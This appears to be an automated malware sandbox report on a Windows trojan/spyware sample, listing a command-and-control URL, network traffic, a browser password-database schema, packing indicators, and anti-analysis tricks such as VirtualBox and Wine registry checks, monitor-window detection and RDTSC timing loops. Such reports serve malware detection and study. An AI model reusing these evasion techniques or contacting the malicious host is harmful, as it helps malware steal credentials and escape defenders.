              Source: file.exe, file.exe, 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001429000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202292935.0000000001450000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183317892.000000000144F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiB
              Source: file.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiI
              Source: file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apib
              Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apik
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apim
              Source: file.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apirH
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apirX
              Source: file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis7
              Source: file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apite
              Source: file.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/jp
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013D499B0_3_013D499B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013D499B0_3_013D499B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013D499B0_3_013D499B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013D499B0_3_013D499B
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979121767241379
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2106978801.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C19000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106978801.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083575720.0000000005C38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 3022848 > 1048576
              Source: file.exeStatic PE information: Raw size of dxfnwksx is bigger than: 0x100000 < 0x2b6400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;dxfnwksx:EW;neetjkms:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dxfnwksx:EW;neetjkms:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2ec60f should be: 0x2ebb2b
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: dxfnwksx
              Source: file.exeStatic PE information: section name: neetjkms
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0143A597 push ss; retf 0_3_0143A5E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01439EB3 push 73FB4736h; iretd 0_3_01439EC4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01435E77 push ss; retf 0_3_01435ECC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01435DBF push ss; retf 0_3_01435ECC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0143827E push ecx; ret 0_3_0143829C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0142A720 push eax; iretd 0_3_0142A721
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0142FC6B push ecx; retf 0002h0_3_0142FC6C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01441C1C pushad ; retf 0_3_01441C1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0144222E push FFFFFFE6h; retf 0_3_01442232
              Source: file.exeStatic PE information: section name: entropy: 7.97049232338871

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA17CD second address: BA17D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1928 second address: BA1943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1943 second address: BA1947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1947 second address: BA195F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65E53D48BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA195F second address: BA1963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1963 second address: BA196F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA196F second address: BA1975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1975 second address: BA1994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D48BEh 0x00000010 jnc 00007F65E53D48B6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1994 second address: BA1998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1998 second address: BA19B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F65E53D48BFh 0x0000000c jp 00007F65E53D48B6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1D8E second address: BA1DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9526h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA1DA8 second address: BA1DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA20C0 second address: BA20C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A24 second address: BA3A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c js 00007F65E53D48CBh 0x00000012 jmp 00007F65E53D48C5h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jp 00007F65E53D48BAh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A9C second address: BA3AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65E53D951Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3C88 second address: BA3CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D48C7h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3CB5 second address: BA3CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3CB9 second address: BA3CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F65E53D48BCh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 jng 00007F65E53D48B6h 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6F42 second address: BB6F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3E54 second address: BC3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3E58 second address: BC3E7C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F65E53D9527h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3E7C second address: BC3E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C2h 0x00000009 jo 00007F65E53D48B6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3E99 second address: BC3E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3E9F second address: BC3EA9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65E53D48B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3EA9 second address: BC3EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F65E53D951Ah 0x00000012 js 00007F65E53D9516h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3EC8 second address: BC3EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F65E53D48BAh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3EDB second address: BC3EF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC4200 second address: BC4206 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC4206 second address: BC4210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65E53D9522h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC4619 second address: BC461D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC461D second address: BC4635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9522h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC474B second address: BC474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC4A0E second address: BC4A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F65E53D9516h 0x0000000a rdtsc
